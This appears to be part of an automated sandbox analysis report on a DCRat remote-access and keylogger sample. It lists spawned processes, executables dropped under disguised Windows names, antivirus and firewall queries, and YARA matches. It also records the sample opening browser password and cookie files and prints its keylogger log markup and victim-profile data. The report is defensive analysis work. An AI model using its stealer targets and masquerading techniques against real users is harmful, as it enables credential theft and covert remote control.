Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <style>img{width:auto;height:400px;}.b-ss{padding-bottom:5px;display:none;}.h{color:#fff;background-color:#4d4d4d;border-radius:3px;padding:3px 0 3px;text-align:center}.b{color:#fff;background-color:#4d4d4d;border-radius:3px;margin-top:10px;padding:5px 5px;opacity:80%}.hl{background-color:#3d8eeb}.b-h{margin-bottom:5px;border-bottom:1px solid #252525}.b-b{word-wrap:break-word}.c{background-color:#2a2a2a;border-radius:3px;text-align:center;vertical-align:middle;width:auto;padding:0 3px;height:17px;display:inline-block;line-height:17px;margin:0 1px 2px 1px}.k{background-color:#f85c50}.cp{color:#fff;float:right;transition:.2s;cursor:pointer;font-size:12px;padding:0 2px 0 2px;opacity:70%}.cp:hover{opacity:100%}.ss{color:#fff;float:right;transition:.2s;cursor:pointer;font-size:12px;padding:0 2px 0 2px;opacity:70%}.ss:hover{opacity:100%}</style> <script>function t(n){var c=document.createElement("textarea");c.value=n,document.body.appendChild(c),c.select(),document.execCommand("Copy"),c.remove()}function d(n){var c=n.parentElement.parentElement.children[1];c.style.display=c.style.display=="block"?"none":"block"}function e(n){var c="";Array.from(n.parentElement.parentElement.children[2].children).forEach(n=>{"c"==n.className?c+=n.innerText:c+=" ["+n.innerText+"] "});t(c);clipbridge.run(c)}</script><meta charset="utf-8"><div class="h">DCRat Keylogger # 17.10.2024</div><div><div></div></div><div class="b"><div class="b-h">Program Manager # 10:41<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c k">Win</span><span class="c">r0D
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"?","History Count (1671)":"?","Keylogger Latest Log (0265)":"17.10.2024 10:41 / 1"},"5.0.1",60,1,"","user","609290","Windows 10 Enterprise 64 Bit","N","Y","N","C:\\Windows\\assembly\\GAC_32\\System.Data.OracleClient","O7KRAFSP7 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: y 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: </div></div><div class="b"><div class="b-h">- - - # 03:04<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c k">Win</span></div></div><div class="b"><div class="b-h">Program Manager # 03:04<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c">r
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Queries volume information: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe VolumeInformation Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Queries volume information: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Users\Default\SystemSettings.exe Queries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
Source: C:\Users\Default\SystemSettings.exe Queries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe Queries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Queries volume information: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\Default\SystemSettings.exe Queries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lv961v43L3.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: apERZQztEJsqymITPFxguVe.exe PID: 4996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: lv961v43L3.exe, type: SAMPLE
Source: Yara match File source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\SystemSettings.exe, type: DROPPED
Source: Yara match File source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match File source: lv961v43L3.exe, type: SAMPLE
Source: Yara match File source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\SystemSettings.exe, type: DROPPED
Source: Yara match File source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

barindex
Source: Yara match File source: 00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lv961v43L3.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: apERZQztEJsqymITPFxguVe.exe PID: 4996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: lv961v43L3.exe, type: SAMPLE
Source: Yara match File source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\SystemSettings.exe, type: DROPPED
Source: Yara match File source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match File source: lv961v43L3.exe, type: SAMPLE
Source: Yara match File source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\SystemSettings.exe, type: DROPPED
Source: Yara match File source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs